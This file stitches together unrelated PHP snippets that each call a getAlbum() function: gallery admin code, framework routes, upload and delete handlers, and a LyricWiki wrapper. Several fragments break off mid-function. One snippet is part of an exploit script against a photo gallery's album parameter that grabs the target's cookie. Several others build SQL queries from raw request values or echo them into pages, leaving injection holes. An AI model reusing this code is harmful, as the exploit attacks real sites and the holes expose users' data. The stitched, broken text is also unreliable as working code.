function printPhotoGrid() { $album = getAlbum(); $photoGrid = "<div id='welcome'>\n <div class='container-fluid clearfix' style='padding:0; overflow:hidden'>\n <div id='ib-main-wrapper' style='height:auto;' class='ib-main-wrapper'>\n <div class='ib-main'>"; //$photoGrid .= buildTextBox($album); $photoGrid .= getAlbumPhotos($album); $photoGrid .= "<div class='clr'></div></div></div></div></div>"; return $photoGrid; }
function moveAlbumDOWN($album_id) { if (albumExists($album_id)) { // Current Album $album = getAlbum($album_id); $order_id = $album['OrderID']; // Nearest Album $q0 = mysql_query("SELECT * FROM `mbg_albums` WHERE `OrderID` > {$order_id} AND `AlbumID` <> {$album_id} ORDER BY `OrderID` ASC LIMIT 0,1"); if (mysql_num_rows($q0)) { $r0 = mysql_fetch_array($q0); $r0_album_id = $r0['AlbumID']; $r0_order_id = $r0['OrderID']; mysql_query("UPDATE `mbg_albums` SET `OrderID` = {$r0_order_id} WHERE `AlbumID` = {$album_id}"); mysql_query("UPDATE `mbg_albums` SET `OrderID` = {$order_id} WHERE `AlbumID` = {$r0_album_id}"); } } }
} }); Flight::route('GET /track/@id/edit', function ($id) { $request = Flight::request(); $track = json_decode(getTrack($id)); if (!isset($track->error)) { Flight::render('editTRack', array('track' => $track), 'body_content'); Flight::render('layout', array('Titre' => 'Modifier le track ' . $track[0]->title)); } else { Flight::redirect($request->referrer); } }); Flight::route('GET|POST /album/@id/edit', function ($id) { $request = Flight::request(); if ($request->method == "GET") { $album = json_decode(getAlbum($id)); if (!isset($album->error)) { Flight::render('editAlbum', array('album' => $album), 'body_content'); Flight::render('layout', array('Titre' => 'Modifier un track à ' . $album[0]->title)); } else { Flight::redirect($request->referrer); } } else { if ($request->method == "POST") { $album = json_encode($_POST); $result = json_decode(editAlbum($album)); if (isset($result->ID)) { Flight::redirect($request->referrer); } else { Flight::redirect('http://localhost/php/App/playlists'); }
<?require_once('session_check.php'); if(!isset($_GET["id"])){ http_response_code(400); exit(); } require_once("album.php"); $owners = getAlbumAllowedEditors($_GET["id"]); if(!isset($_SESSION["id"]) || !in_array($_SESSION["id"], $owners, TRUE)){ http_response_code(403); exit(); } if(!existsAlbum($_GET["id"])){ http_response_code(404); exit(); } $album = getAlbum($_GET["id"]); $deleted = deleteAlbum($_GET["id"]); var_dump($deleted); if(!$deleted){ http_response_code(500); exit; } http_response_code(200); header("Location: ../event.php?id=".$album["eid"]); ?>
<? require_once('session_check.php'); require_once("album.php"); if(existsAlbum($_POST["albumId"])){ addAlbumPhoto($_POST["albumId"],$_FILES["albumImage"]); $eventID = getAlbum($_POST["albumId"])["eid"]; http_response_code(200); if(1){//!isset($_POST["return_json"]) && $_POST["return_json"]){ echo json_encode(getAlbumImages(getAlbum($_POST["albumId"]))); } else header("Location: ../manageAlbums.php?eid=".$eventID); } else{ http_response_code(400); header("Location: ../index.php"); }
mysql_query("UPDATE `mbg_albums` SET `Thumbnail3Size` = '{$size3['0']}x{$size3['1']}' WHERE `AlbumID` = '{$last_id}'"); } } } } // Start Uploading Files if ($upload_image = $_FILES['upload_image']) { $album_id = $_GET['album_id']; $allowed_file_types = array("jpg", "png", "jpeg", "gif"); $file_name = $upload_image['name']; $file_type = strtolower(end(explode(".", $file_name))); $file_tmp = $upload_image['tmp_name']; $path_to_upload_files = $images_path; if (in_array($file_type, $allowed_file_types)) { if (albumExists($album_id)) { $album = getAlbum($album_id); // Generate Name switch (strtolower($naming)) { case "hash": case "random": $new_name = substr(time(), 5) . '_' . substr(md5(time() + rand(1000, 9999)), 0, 6) . '_' . substr(sha1(time() + rand(1000, 9999)), 0, 6) . '.' . $file_type; break; case "normal": $new_name = $file_name; break; default: $new_name = str_replace(array(',', "'", '"'), '-', strtolower($file_name)); } $album_path = $path_to_upload_files . 'album_' . $album_id . '/'; $upload_file_path = $album_path . $new_name; if (!file_exists($album_path)) {
<?php $id = $_GET['id']; if (albumExists($id)) { $album = getAlbum($id); $images = getAlbumImages($id); ?> <script type="text/javascript" src="js/album_manage.js"></script> <a href="?action=album&id=<?php echo $id; ?> &edit" class="button" title="Click to edit">Album: <strong><?php echo $album['AlbumName']; ?> </strong></a> <div class="separator"></div> <h1>Manage Album</h1> <?php if (isset($_GET['edit'])) { include "edit_album.php"; } ?> <form action="" method="post" enctype="multipart/form-data" name="form1"> <input type="hidden" name="album_id" id="album_id" value="<?php echo $album['AlbumID']; ?> "> <input type="file" name="upload_image" id="upload_image" class="button"> </form> <?php
/** * REST wrapper to the SOAP's getAlbum function. This returns the discography * for a single album. Please note that the entry-point can parse 'album' into * albumName and albumYear if 'album' is provided in the normal LyricWiki page * title format (such as "Pink Floyd" for 'artist' and "Dark Side Of The Moon (1973)" for * 'album'). */ function rest_getAlbum($artist, $albumName, $albumYear, $fmt) { wfProfileIn(__METHOD__); if (empty($fmt)) { $fmt = 'html'; } $result = getAlbum($artist, $albumName, $albumYear); switch ($fmt) { case 'php': print serialize($result); break; case 'text': $this->dumpText($result); break; case 'json': case 'realjson': $this->writeRealJSON($result); break; case 'xml': // TODO: IMPLEMENT // TODO: IMPLEMENT case 'html': default: $albumName = getVal($result, 'album'); $year = getVal($result, 'year'); $amznLink = getVal($result, 'amazonLink'); $songs = getVal($result, 'songs'); print "<a href='{$this->root}" . $this->linkEncode("{$artist}:{$albumName}" . ($year == "" ? "" : "_({$year})")) . "'>{$albumName}" . ($year == "" ? "" : "_({$year})") . "</a>"; if ($amznLink != "") { print " - (at <a href='{$amznLink}' title=\"{$albumName} at amazon\">amazon</a>)"; } if (count($songs) > 0) { print "<ul class='songs'>\n"; foreach ($songs as $currSong) { if (strpos($currSong, ":") !== false) { print "<li><a href='{$this->root}" . $this->linkEncode($currSong) . "'>{$currSong}</a></li>\n"; } else { print "<li><a href='{$this->root}" . $this->linkEncode("{$artist}:{$currSong}") . "'>{$currSong}</a></li>\n"; } } print "</ul>\n"; } print "</li>\n"; break; } wfProfileOut(__METHOD__); }
<? session_start(); require_once("database/album.php"); if(!isset($_GET['id'])){ http_response_code(400); ?><p> No album was specified </p><? exit; } if(!existsAlbum($_GET['id'])){ http_response_code(404); ?><p> The album does not exist in the server </p><? exit; } $album = getAlbum($_GET['id']); $eventId = intval(getAlbum($_GET['id'])['eid']); $albumImages = getAlbumImages($album); ?> <!DOCTYPE html> <html> <head> <?require_once('includes.php');?> <script type="text/javascript" src="scripts/view_album.js"></script> <link rel="stylesheet" type="text/css" href="stylesheets/album.css" > </head> <body> <?require_once('templates/header.php');?> <section id="album"> <h1> <?echo $album['nome'];?></h1>
$sn++; if ($sn > 32) { return; } } } ############################################################### ## START E X P L O I T C O D E ############################################################# echo ' Exploiting: [+] target: ' . $argv[1] . '/' . $argv[2] . ' '; $page = ''; $firstReply = sendit($page, 'GET'); $album = getAlbum($firstReply); ### get valid album number if ($album == 0) { echo "[-] No valid album found...\n"; if ($argv[3] != 0) { echo "... Forcing\n"; $album = $argv[3]; } else { credits(); } } $page = 'thumbnails.php?album=' . $album; $GLOBALS['album'] = $album; echo "[+] Valid album number: " . $album . "\n"; $GLOBALS['cookies'] = getCookie($firstReply); ### get cookie from host
<?require_once('session_check.php'); if(!isset($_POST["aid"]) || !isset($_POST["iid"])){ http_response_code(400); exit(); } require_once("album.php"); $owners = getAlbumAllowedEditors($_POST["aid"]); $album = getAlbum($_POST["aid"]); if(!isset($_SESSION["id"]) || !in_array($_SESSION["id"], $owners, TRUE) ){ http_response_code(403); exit(); } if(!existsAlbum($_POST["aid"])|| !imageInAlbum($_POST["iid"], $_POST["aid"])){ http_response_code(404); exit(); } require("connect.php"); $stmt2 = $db->prepare("DELETE FROM ImageAlbum WHERE iid=? and aid=?"); $res2 = $stmt2->execute(array($_POST["iid"], $_POST["aid"])); $stmt = $db->prepare('DELETE FROM Image WHERE iid=?'); $res = $stmt->execute(array($_POST["iid"])); if(!$res || !$res2){ http_response_code(500); var_dump($_POST["iid"]); exit; } http_response_code(200);